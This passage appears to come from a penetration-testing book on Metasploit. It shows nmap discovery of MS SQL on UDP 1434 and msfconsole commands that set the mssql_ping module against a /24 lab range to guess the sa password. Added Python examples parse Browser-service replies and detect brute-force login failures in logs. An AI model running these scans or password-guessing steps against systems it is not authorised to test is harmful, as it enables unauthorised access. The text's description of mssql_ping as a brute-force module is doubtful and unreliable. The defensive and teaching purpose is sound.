
Meterpreter

77

To begin, we identify the MS SQL installation, and then launch a MS SQL Server brute force attack to see if we can guess a password. By default, MS SQL is installed on TCP port 1433 and UDP port 1434, though newer versions allow for installation on a dynamically allocated port, which can be randomized. Luckily, port 1434 UDP (for which we did not scan) remains the same and can be queried to identify the dynamic port of the SQL server.

Here, we scan the system and see that MS SQL port 1434 UDP is open:

msf > nmap -sU 192.168.33.130 -p1434

Nmap scan report for 192.168.33.130
Host is up (0.00033s latency).
PORT     STATE         SERVICE
1434/udp open         ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
msf >

As you can see, we scan our host with nmap and the results show that MS SQL UDP port 1434 is open. (Chapters 11, 13, and 17 will cover MS SQL in much more depth.)
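The reason UDP 1434 is so useful is that the SQL Server Browser service answers a single datagram with a text record describing every instance on the host, including the TCP port each one listens on. The parser below is an added example, not code from the book or from Metasploit; it decodes a response in the MS-SQLR layout (a 0x05 byte, a 16-bit little-endian length, then semicolon-delimited key/value pairs with each instance terminated by ";;") so that a defender inventorying hosts can see which instances have wandered onto non-default ports. The response bytes are constructed here, not captured from a real server.

```python
import struct

# Constructed sample response (not a real capture) in the MS-SQLR layout:
# 0x05, 16-bit little-endian body length, then semicolon-delimited key/value
# pairs, one instance per ";;"-terminated record. Server and instance names
# are placeholders.
SAMPLE_BODY = (
    "ServerName;WIN2K3;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;9.00.1399.06;tcp;1433;;"
    "ServerName;WIN2K3;InstanceName;SQLEXPRESS;IsClustered;No;"
    "Version;10.50.1600.1;tcp;49170;"
    "np;\\\\WIN2K3\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
).encode("ascii")
SAMPLE_RESPONSE = b"\x05" + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY

DEFAULT_TCP_PORT = 1433


def parse_ssrp_response(data):
    """Decode a Browser-service response into one dict per instance."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP server response (expected leading 0x05)")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    # Records are separated by ";;". A record with an empty value would also
    # produce ";;", so this simple split assumes every key carries a value.
    for record in body.split(";;"):
        record = record.strip(";")
        if not record:
            continue
        fields = record.split(";")
        info = {}
        for i in range(0, len(fields) - 1, 2):
            info[fields[i]] = fields[i + 1]
        instances.append(info)
    return instances


def tcp_ports(instances):
    """Map instance name -> TCP listener port for instances that expose TCP."""
    return {inst.get("InstanceName"): int(inst["tcp"])
            for inst in instances if "tcp" in inst}


def dynamic_port_instances(instances):
    """Names of instances not listening on the default TCP port."""
    return [name for name, port in tcp_ports(instances).items()
            if port != DEFAULT_TCP_PORT]


if __name__ == "__main__":
    found = parse_ssrp_response(SAMPLE_RESPONSE)
    for name, port in tcp_ports(found).items():
        print(f"{name}: tcp/{port}")
    print("on non-default ports:", dynamic_port_instances(found))
```

The point for a defender is the same one the scan makes: a firewall rule that only covers TCP 1433 misses SQLEXPRESS on 49170, while anyone who can reach UDP 1434 learns that port for free. Blocking or restricting the Browser service, or at least monitoring UDP 1434 traffic, closes that gap.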

When targeting MS SQL, we can leverage the mssql_ping module to brute force the MS SQL port and attempt to guess the username and password. When MS SQL is first installed, the program will require the user to create an sa, or system administrator, account. You'll often be able to guess or brute force the sa account password, because when administrators install this application they do not understand the security ramifications of using either a blank password or something too simple.
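A weak sa password is only half the story; the other half is that a password-guessing run against it is loud. SQL Server writes one error 18456 pair to its ERRORLOG for every failed login when failed-login auditing is enabled, and the CLIENT address is in the message. The script below is an added example, not from the book or from Metasploit: it parses constructed ERRORLOG lines (modelled on the engine's real message format, not taken from a real server) and raises an alert when one client fails against one login more than a threshold number of times inside a sliding time window, which is exactly what a brute force run against sa looks like from the server side.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (not from a real server). Six rapid failures
# for 'sa' from one client, then a single stray failure from another client.
SAMPLE_ERRORLOG = """\
2011-07-09 21:15:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2011-07-09 21:15:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:15:01.31 Logon       Error: 18456, Severity: 14, State: 8.
2011-07-09 21:15:01.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:15:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:15:01.70 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:15:01.91 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:15:02.14 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-07-09 21:20:44.02 Logon       Error: 18456, Severity: 14, State: 8.
2011-07-09 21:20:44.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.50]
"""

# Matches only the descriptive line of the 18456 pair; the "Error: 18456"
# line carries no user or client and is skipped.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Return (timestamp, user, client) for each 'Login failed' line."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Map (client, user) -> peak failure count for pairs that exceed the
    threshold inside any window-sized span. Sliding window per pair."""
    stamps_by_key = defaultdict(list)
    for ts, user, client in sorted(events):
        stamps_by_key[(client, user)].append(ts)
    alerts = {}
    for key, stamps in stamps_by_key.items():
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts


if __name__ == "__main__":
    for (client, user), count in detect_bruteforce(
            parse_failed_logins(SAMPLE_ERRORLOG)).items():
        print(f"possible brute force: {count} failures for '{user}' from {client}")
```

The threshold and window are deliberately low here so the constructed sample trips them; in production they are tuned against the normal failure rate, and the alert pairs naturally with the mitigations the text implies: a strong sa password (or disabling sa outright), Windows-only authentication where possible, and an account lockout or login-throttling policy.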

In the next example, we look for the mssql_ping module and attempt to brute force the sa account:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   THREADS   1                yes       The number of concurrent threads
   USERNAME  sa               no        The username to authenticate as

msf auxiliary(mssql_ping) > set RHOSTS 192.168.33.1/24
RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] Scanned 040 of 256 hosts (015% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 080 of 256 hosts (031% complete)
[*] Scanned 115 of 256 hosts (044% complete)